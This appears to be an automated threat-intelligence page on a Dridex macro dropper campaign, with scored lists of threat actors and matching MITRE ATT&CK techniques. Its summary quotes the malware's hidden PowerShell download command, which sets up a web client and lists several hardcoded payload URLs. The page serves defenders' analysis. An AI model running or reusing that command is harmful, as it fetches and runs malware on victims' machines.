Trusted Design

Dridex droppers

概要

The mentioned URL were hardcoded in the obfuscated vbscript that was embedded a macro in a doc file Below is the command : cmd.exe /c start /b powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$word = new-object -ComObject word.application;$random = new-object random;$version = $word.version;$urls = 'http://meyermuehltal.de/0h656jk,http://technologyservice.eu/0h656jk,http://tspars.com/0h656jk,http://thaipowertools.com/0h656jk'.Split(',');

Created: 2026-02-23

Indicators

Indicatorsは見つかっていない。

類似Pulses

Dridex Download URL from Malicious Macro - 05/05/2016 (score: 0.71)
Spam Delivering Malicious Word Document (score: 0.63)
PowerSniff Malware Used in Macro-based Attacks (score: 0.56)
Dyre Botnet Using Malicious Microsoft Word Macros (score: 0.56)
Dridex SPAM campaign (score: 0.55)

このPulseに関連する脅威アクター (事実ベース)

APT32

Score: 9.84

Matched TTPs:

T1216.001 - PubPrn
T1027.010 - Command Obfuscation
T1105 - Ingress Tool Transfer
T1564.001 - Hidden Files and Directories

MITREへのリンク →

Medusa Group

Score: 10.39

Matched TTPs:

T1608.002 - Upload Tool
T1027.010 - Command Obfuscation
T1105 - Ingress Tool Transfer
T1529 - System Shutdown/Reboot

MITREへのリンク →

Threat Group-3390

Score: 8.06

Matched TTPs:

T1608.002 - Upload Tool
T1105 - Ingress Tool Transfer
T1027.015 - Compression

MITREへのリンク →

Kimsuky

Score: 9.77

Matched TTPs:

T1027.012 - LNK Icon Smuggling
T1027.010 - Command Obfuscation
T1105 - Ingress Tool Transfer
T1102.001 - Dead Drop Resolver

MITREへのリンク →

Gamaredon Group

Score: 9.64

Matched TTPs:

T1027.012 - LNK Icon Smuggling
T1027.010 - Command Obfuscation
T1105 - Ingress Tool Transfer
T1027.015 - Compression

MITREへのリンク →

Mustang Panda

Score: 7.29

Matched TTPs:

T1027.012 - LNK Icon Smuggling
T1105 - Ingress Tool Transfer
T1564.001 - Hidden Files and Directories

MITREへのリンク →

APT28

Score: 7.98

Matched TTPs:

T1546.015 - Component Object Model Hijacking
T1105 - Ingress Tool Transfer
T1564.001 - Hidden Files and Directories

MITREへのリンク →

APT29

Score: 5.31

Matched TTPs:

T1090.004 - Domain Fronting
T1105 - Ingress Tool Transfer

MITREへのリンク →

Patchwork

Score: 5.93

Matched TTPs:

T1027.010 - Command Obfuscation
T1105 - Ingress Tool Transfer
T1102.001 - Dead Drop Resolver

MITREへのリンク →

FIN7

Score: 5.31

Matched TTPs:

T1027.010 - Command Obfuscation
T1105 - Ingress Tool Transfer
T1564.001 - Hidden Files and Directories

MITREへのリンク →

HAFNIUM

Score: 3.44

Matched TTPs:

T1105 - Ingress Tool Transfer
T1564.001 - Hidden Files and Directories

MITREへのリンク →

Tropic Trooper

Score: 3.44

Matched TTPs:

T1105 - Ingress Tool Transfer
T1564.001 - Hidden Files and Directories

MITREへのリンク →

Lazarus Group

Score: 7.06

Matched TTPs:

T1105 - Ingress Tool Transfer
T1564.001 - Hidden Files and Directories
T1529 - System Shutdown/Reboot

MITREへのリンク →

APT37

Score: 4.40

Matched TTPs:

T1105 - Ingress Tool Transfer
T1529 - System Shutdown/Reboot

MITREへのリンク →

TA2541

Score: 3.93

Matched TTPs:

T1105 - Ingress Tool Transfer
T1027.015 - Compression

MITREへのリンク →

Leviathan

Score: 3.93

Matched TTPs:

T1105 - Ingress Tool Transfer
T1027.015 - Compression

MITREへのリンク →

Molerats

Score: 3.93

Matched TTPs:

T1105 - Ingress Tool Transfer
T1027.015 - Compression

MITREへのリンク →

Rocke

Score: 6.73

Matched TTPs:

T1105 - Ingress Tool Transfer
T1564.001 - Hidden Files and Directories
T1102.001 - Dead Drop Resolver

MITREへのリンク →

APT38

Score: 4.40

Matched TTPs:

T1105 - Ingress Tool Transfer
T1529 - System Shutdown/Reboot

MITREへのリンク →

LuminousMoth

Score: 3.44

Matched TTPs:

T1105 - Ingress Tool Transfer
T1564.001 - Hidden Files and Directories

MITREへのリンク →

FIN13

Score: 3.44

Matched TTPs:

T1105 - Ingress Tool Transfer
T1564.001 - Hidden Files and Directories

MITREへのリンク →

APT41

Score: 4.06

Matched TTPs:

T1105 - Ingress Tool Transfer
T1102.001 - Dead Drop Resolver

MITREへのリンク →

BRONZE BUTLER

Score: 4.06

Matched TTPs:

T1105 - Ingress Tool Transfer
T1102.001 - Dead Drop Resolver

MITREへのリンク →

Axiom

Score: 4.54

Matched TTPs:

T1001.002 - Steganography

MITREへのリンク →

RTM

Score: 3.29

Matched TTPs:

T1102.001 - Dead Drop Resolver

MITREへのリンク →

Higaisa

Score: 3.15

Matched TTPs:

T1027.015 - Compression

MITREへのリンク →

Mofang

Score: 3.15

Matched TTPs:

T1027.015 - Compression

MITREへのリンク →

このPulseに関連する脅威アクター (推論ベース)

Medusa Group

Score: 0.74

Matched TTPs:

T1027.010 - Command Obfuscation
T1529 - System Shutdown/Reboot
T1105 - Ingress Tool Transfer
T1608.002 - Upload Tool

MITREへのリンク →

APT32

Score: 0.74

Matched TTPs:

T1216.001 - PubPrn
T1105 - Ingress Tool Transfer
T1564.001 - Hidden Files and Directories
T1027.010 - Command Obfuscation

MITREへのリンク →

Kimsuky

Score: 0.69

Matched TTPs:

T1027.010 - Command Obfuscation
T1105 - Ingress Tool Transfer
T1102.001 - Dead Drop Resolver
T1027.012 - LNK Icon Smuggling

MITREへのリンク →

Gamaredon Group

Score: 0.69

Matched TTPs:

T1027.010 - Command Obfuscation
T1105 - Ingress Tool Transfer
T1027.015 - Compression
T1027.012 - LNK Icon Smuggling

MITREへのリンク →

Threat Group-3390

Score: 0.62

Matched TTPs:

T1105 - Ingress Tool Transfer
T1027.015 - Compression
T1608.002 - Upload Tool

MITREへのリンク →

APT28

Score: 0.59

Matched TTPs:

T1564.001 - Hidden Files and Directories
T1105 - Ingress Tool Transfer
T1546.015 - Component Object Model Hijacking

MITREへのリンク →

Related CVEs

このPulseに見つかったCVEはありません。

Pulse – 脅威アクターグラフ

← Pulse一覧に戻る